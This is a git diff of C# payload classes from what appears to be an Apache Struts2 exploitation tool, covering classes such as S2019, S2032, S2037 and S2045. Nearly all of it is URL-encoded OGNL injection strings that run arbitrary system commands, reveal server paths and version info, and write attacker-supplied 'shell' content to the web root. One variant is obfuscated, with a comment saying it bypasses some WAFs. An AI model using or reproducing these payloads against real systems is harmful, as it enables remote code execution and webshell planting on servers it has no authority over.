+ private String Exp_Path="redirect:$%7b%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22web%22%29,%23resp.getWriter%28%29.print%28%22path:%22%29,%23resp.getWriter%28%29.print%28%23req.getSession%28%29.getServletContext%28%29.getRealPath%28%22/%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ //private String Exp_Exec = "redirect:$%7b%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23s%3dnew%20java.util.Scanner%28%28new%20java.lang.ProcessBuilder%28%27[cmd]%27.toString%28%29.split%28%27\\\\s%27%29%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27\\\\AAAA%27%29,%23str%3d%23s.hasNext%28%29?%23s.next%28%29:%27%27,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.println%28%23str%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ //绕过部分waf
+ private String Exp_Exec = "redirect:$%7b%23req%3d%23co%6etext.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23s%3dnew%20java.util.Scanner%28%28new%20java.lang.%50rocessBuilder%28%27[cmd]%27.toString%28%29.split%28%27\\\\s%27%29%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27\\\\AAAA%27%29,%23str%3d%23s.hasNext%28%29?%23s.next%28%29:%27%27,%23resp%3d%23co%6etext.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.println%28%23str%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ private String Exp_Upload = "redirect:$%7b%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%23req.getRealPath(%27/[pathfilename]%27)%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29%7d&shell=[filecontent]";
+ //自定义路径
+ private String Exp_SetMyUpload = "redirect:$%7b%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.File%28%27[path]%27%29.mkdirs%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%27[pathfilename]%27%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29%7d&shell=[filecontent]";
+
- private String Exp_Path="redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
- private String Exp_Exec = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27[cmd]%27.toString().split(%27\\\\s%27))).start().getInputStream()).useDelimiter(%27\\\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
- private String Exp_Upload = "redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22oko%22),%23res.getWriter().print(%22kok/%22),%23res.getWriter().print(%23req.getContextPath()),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter([path])).append(%23req.getParameter(%22shell%22)).close()}&shell=[filecontent]";
public String Get_Exp_Check()
{
return this.Exp_Check;
@@ -31,13 +45,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "%23req.getRealPath(%22/"+ fileName + "%22)";
- this.Exp_Upload=this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload=this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "%22"+path+ "%22");
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[pathfilename]",path+"/"+fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
diff --git a/Test/payload/S2019.cs b/Test/payload/S2019.cs
index 23bd6f6..8400f8c 100644
--- a/Test/payload/S2019.cs
+++ b/Test/payload/S2019.cs
@@ -6,13 +6,16 @@ namespace payload
{
public class S2019:BasePayload
{
- private String Exp_Check = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_VerInfo = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22[vername]:%22),%23resp.getWriter().print(@java.lang.System@getProperty(%22[vername]%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_Path= "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()";
+ private String Exp_Check = "debug=command&expression=%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22struts2_security_%22%29,%23resp.getWriter%28%29.print%28%22check%22%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_VerInfo = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22[vername]:%22%29,%23resp.getWriter%28%29.print%28@java.lang.System@getProperty%28%22[vername]%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_Path= "debug=command&expression=%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22web%22%29,%23resp.getWriter%28%29.print%28%22path:%22%29,%23resp.getWriter%28%29.print%28%23req.getSession%28%29.getServletContext%28%29.getRealPath%28%22/%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
//部分情况获取不到结果
- //private String Exp_Exec = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%22[cmd]%22)).start().getInputStream()).useDelimiter(%27\\\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_Exec = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%22[cmd]%22).getInputStream())),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_Upload = "debug=command&expression=%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22oko%22),%23res.getWriter().print(%22kok/%22),%23res.getWriter().print(%23req.getContextPath()),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter([path])).append(%23req.getParameter(%22shell%22)).close()&shell=[filecontent]";
+ //private String Exp_Exec = "debug=command&expression=%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23s%3dnew%20java.util.Scanner%28%28new%20java.lang.ProcessBuilder%28%22[cmd]%22%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27\\\\AAAA%27%29,%23str%3d%23s.hasNext%28%29?%23s.next%28%29:%27%27,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.println%28%23str%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_Exec = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%22[cmd]%22%29.getInputStream%28%29%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_Upload = "debug=command&expression=%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%27[path]%27%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29&shell=[filecontent]";
+ private String Exp_SetMyUpload = "debug=command&expression=%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.File%28%27[path]%27%29.mkdirs%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%27[pathfilename]%27%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29&shell=[filecontent]";
+
+
public String Get_Exp_Check()
{
return this.Exp_Check;
@@ -32,13 +35,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "%23req.getRealPath(%22/"+ fileName + "%22)";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "%22"+path+ "%22");
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[pathfilename]", path+"/"+ fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
diff --git a/Test/payload/S2032.cs b/Test/payload/S2032.cs
index cfb9ddf..b9af1cf 100644
--- a/Test/payload/S2032.cs
+++ b/Test/payload/S2032.cs
@@ -10,9 +10,9 @@ public class S2032:BasePayload
private String Exp_VerInfo = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.vername[0]),%23w.print(@java.lang.System@getProperty(%23parameters.verval[0])),%23w.close(),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&vername=[vername]%3a&verval=[vername]";
private String Exp_Path = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&web=web&path=path%3a";
private String Exp_Exec = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=[cmd]&pp=\\\\AAAA&ppp=%20&encoding=UTF-8";
- private String Exp_Upload = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=[filename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
- private String Exp_Upload_Path= "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=[path]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
-
+ private String Exp_Upload = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+ private String Exp_Upload_Path= "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new+java.io.File%28%23parameters.path[0]%29.mkdirs%28%29,new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&path=[path]&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+
public String Get_Exp_Check()
{
return this.Exp_Check;
@@ -32,12 +32,14 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- this.Exp_Upload = this.Exp_Upload.Replace("[filename]", fileName);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
+ this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[pathfilename]", path+"/"+ fileName);
this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[path]", path);
+ return this.Exp_Upload_Path.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
diff --git a/Test/payload/S2037.cs b/Test/payload/S2037.cs
index f1c0070..3be8763 100644
--- a/Test/payload/S2037.cs
+++ b/Test/payload/S2037.cs
@@ -10,8 +10,8 @@ public class S2037:BasePayload
private String Exp_VerInfo = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.vername[0]),%23w.print(@java.lang.System@getProperty(%23parameters.verval[0])),%23w.close()):xx.toString.json?&pp=%2f&encoding=UTF-8&vername=[vername]%3a&verval=[vername]";
private String Exp_Path = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),%23w.close()):xx.toString.json?&pp=%2f&encoding=UTF-8&web=web&path=path";
private String Exp_Exec = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close()):xx.toString.json&cmd=[cmd]&pp=\\\\AAAA&ppp=%20&encoding=UTF-8";
- private String Exp_Upload = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&shellname=[filename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
- private String Exp_Upload_Path= "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&shellname=[path]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+ private String Exp_Upload = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+ private String Exp_Upload_Path= "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),new+java.io.File%28%23parameters.path[0]%29.mkdirs%28%29,new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close()):xx.toString.json&path=[path]&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
public String Get_Exp_Check()
{
return this.Exp_Check;
@@ -31,12 +31,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- this.Exp_Upload = this.Exp_Upload.Replace("[filename]", fileName);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[path]", path);
+ this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[pathfilename]", path+"/"+ fileName);
+ return this.Exp_Upload_Path.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
diff --git a/Test/payload/S2045.cs b/Test/payload/S2045.cs
index 101456e..ba760c3 100644
--- a/Test/payload/S2045.cs
+++ b/Test/payload/S2045.cs
@@ -17,7 +17,8 @@ public class S2045:BasePayload
//private String Exp_Upload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}";
